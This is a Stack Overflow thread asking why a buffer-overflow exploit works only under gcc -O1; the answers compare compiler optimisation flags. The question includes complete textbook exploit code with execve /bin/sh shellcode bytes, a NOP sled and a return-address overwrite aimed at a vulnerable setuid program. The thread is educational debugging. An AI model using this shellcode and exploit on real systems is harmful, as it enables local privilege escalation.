5

When working on stack overflows, I noticed that one only works when I compile it with '-O1'. In order to understand which option is responsible for the difference, I manually entered the -O1 options (taken from the page for my version, which coincides with what I find when checking man gcc on my machine). However, the program then again doesn't work.

I did notice this probably not helpful warning output after compiling with -O1 only:
exploit_notesearch.c:31:10: warning: ignoring return value of ‘system’, declared with attribute warn_unused_result [-Wunused-result].

Any ideas? Someone else pointed the difference out in an old SO question, but it remained unresolved.

Data:
- Ubuntu 12.04
- gcc 4.6.3.
- x86 32 bit
- a C program

Note: as to the overflow working, I already disabled everything known to me that would prevent overflows (canaries, ASLR, execstack, stack alignment).

Code (probably irrelevant for question). This function calls another I could post; but I don't believe it should matter (will upon request):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}
Community
  • 1
  • 1
gnometorule
  • 2,151
  • 2
  • 20
  • 29
  • 2
    Did you read the resulting code, to see what the difference actually is? Also, even in scary exploit code, there's still [no reason to cast the return value of `malloc()` in C, so don't do that](http://stackoverflow.com/a/605858/28169). – unwind Nov 27 '13 at 15:25
  • @unwind: I started comparing, and it's massively different (loops unrolled, no frame pointer, ...). In order to understand why this works though I would need to understand why the other doesn't. There is no reason it shouldn't: (a) it's straight from a book (hence the ill-casting that I didn't change); and when I worked with the same code 2 weeks ago, I compiled and worked even without -O1 (the only update I had was installing gtk+). – gnometorule Nov 27 '13 at 15:36
  • @unwind: The only idea I had was that ebp (no longer used) is corrupted, so I compiled with -fno-frame-pointer. However, that option being implemented somehow optionally based on man, I still had a frame pointer after; so I cannot confirm that, nor, apparently, reproduce it easily. – gnometorule Nov 27 '13 at 15:39
  • Note that compiling with `-S -fverbose-asm` flag will tell you more about what optimizations are enabled in a large comment block at the top of the resulting assembly file, in excruciating detail, actually. (The `-S` flag stops the compiler after generating assembly code, before assembling into an object.) – Joe Z Nov 27 '13 at 23:34
  • @Joe: that is very helpful. Among others, I had already assembled only (as you suggest), but didn't know this option. Does this flag tell you more than the -v option used when one-step-compiling? ( I had tried that one; not helpful for this case). Will try when back home. – gnometorule Nov 27 '13 at 23:44
  • 1
    @gnometorule: Here's a screen cap of what it output for one of my source files, to give you a sense: http://spatula-city.org/~im14u2c/images/compiler_output.png I assure you my command line to GCC was much, much shorter than that. I hadn't even heard of many of these. – Joe Z Nov 27 '13 at 23:56
  • I've closed this as a duplicate of the question you linked to, see [my answer](https://stackoverflow.com/a/48746895/981959) there for the explanation. – Jonathan Wakely Feb 12 '18 at 12:53

2 Answers2

2

You can print out the optimisations that gcc actually uses by running

gcc -Q -O0 --help=optimizers

(or any other optimisation level instead of -O0).

creichen
  • 1,728
  • 9
  • 16
  • Even when using all the flags listed as `Enabled` I can't reproduce the same speedup as `-O1` gives. Opened bug here: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=84327 – mxmlnkn Feb 12 '18 at 10:54
0

The man page description of what is incrementally enabled under -O1 is off in a number of ways (for a summary, see end of this answer).

Following the suggestion by @Joe Z (to assemble only, with -fverbose-asm), at no optimization, the following options are enabled:

    # options enabled:  -fasynchronous-unwind-tables -fauto-inc-dec
    # -fbranch-count-reg -fcommon -fdelete-null-pointer-checks -fdwarf2-cfi-asm
    # -fearly-inlining -feliminate-unused-debug-types -ffunction-cse -fgcse-lm
    # -fident -finline-functions-called-once -fira-share-save-slots
    # -fira-share-spill-slots -fivopts -fkeep-static-consts
    # -fleading-underscore -fmath-errno -fmerge-debug-strings
    # -fmove-loop-invariants -fpcc-struct-return -fpeephole
    # -fprefetch-loop-arrays -fsched-critical-path-heuristic
    # -fsched-dep-count-heuristic -fsched-group-heuristic -fsched-interblock
    # -fsched-last-insn-heuristic -fsched-rank-heuristic -fsched-spec
    # -fsched-spec-insn-heuristic -fsched-stalled-insns-dep -fshow-column
    # -fsigned-zeros -fsplit-ivs-in-unroller -fstack-protector
    # -fstrict-volatile-bitfields -ftrapping-math -ftree-cselim -ftree-forwprop
    # -ftree-loop-if-convert -ftree-loop-im -ftree-loop-ivcanon
    # -ftree-loop-optimize -ftree-parallelize-loops= -ftree-phiprop -ftree-pta
    # -ftree-reassoc -ftree-scev-cprop -ftree-slp-vectorize
    # -ftree-vect-loop-version -funit-at-a-time -funwind-tables
    # -fvect-cost-model -fverbose-asm -fzero-initialized-in-bss -m32 -m80387
    # -m96bit-long-double -maccumulate-outgoing-args -malign-stringops
    # -mfancy-math-387 -mfp-ret-in-387 -mglibc -mieee-fp -mno-red-zone
    # -mno-sse4 -mpush-args -msahf -mtls-direct-seg-refs  

By and large, assembling with -O0 creates the same .s file. Running a diff between the .s file assembled w/o optimizations, and the one assembled with -O1, yields this difference (as spit out by diff):

> -fcombine-stack-adjustments
> -fcompare-elim
> -fcprop-registers
> -fdefer-pop
> -fforward-propagate
> -fguess-branch-probability
> -fif-conversion
> -fif-conversion2
> -finline
> -fipa-profile
> -fipa-pure-const
> -fipa-reference
> -fmerge-constants
> -fomit-frame-pointer
> -fsplit-wide-types
> -ftoplevel-reorder
> -ftree-bit-ccp
> -ftree-ccp
> -ftree-ch
> -ftree-copy-prop
> -ftree-copyrename
> -ftree-dce
> -ftree-dominator-opts
> -ftree-dse  

For comparison w/o having to go to the page, the man page says that -O1 enables:

-fauto-inc-dec 
-fcompare-elim 
-fcprop-registers 
-fdce 
-fdefer-pop 
-fdelayed-branch 
-fdse 
-fguess-branch-probability 
-fif-conversion2 
-fif-conversion 
-fipa-pure-const 
-fipa-profile 
-fipa-reference 
-fmerge-constants
-fsplit-wide-types 
-ftree-bit-ccp 
-ftree-builtin-call-dce 
-ftree-ccp 
-ftree-ch 
-ftree-copyrename 
-ftree-dce 
-ftree-dominator-opts 
-ftree-dse 
-ftree-forwprop 
-ftree-fre 
-ftree-phiprop 
-ftree-sra 
-ftree-pta 
-ftree-ter 
-funit-at-a-time  
-fomit-frame-pointer  

So among the options claimed to be enabled by -O1, there are these categories:

(1) those which actually are (e.g., -fcompare-elim)

(2) those already enabled under -O0 (e.g., -fauto-inc-dec)

(3) those which are neither enabled under -O0 or -O1 (e.g., -fdce)

(4) those actually enabled, which are not mentioned on the -O1 list (e.g., -fcombine-stack-adjustments)

(note that -fdelayed-branch will only be enabled on architectures that support delayed branches, which mine doesn't; so it is a special case and not really missing)

gnometorule
  • 2,151
  • 2
  • 20
  • 29
  • I realize there is significant overlap between the 'in' and 'out', and the exact content of what is added in -O1 needs careful reading of the diff output. – gnometorule Nov 28 '13 at 13:48
  • It might help to put each option on its own line before diffing (`sed '/s /\n'` or whatever the `sed` syntax would be, after removing the `#`). – rubenvb Nov 28 '13 at 13:52
  • Split the lists of options into one option per line and sort each list, before diffing. – unwind Nov 28 '13 at 13:55
  • @rubenvb, unwind: good idea, will post shortly. – gnometorule Nov 28 '13 at 14:28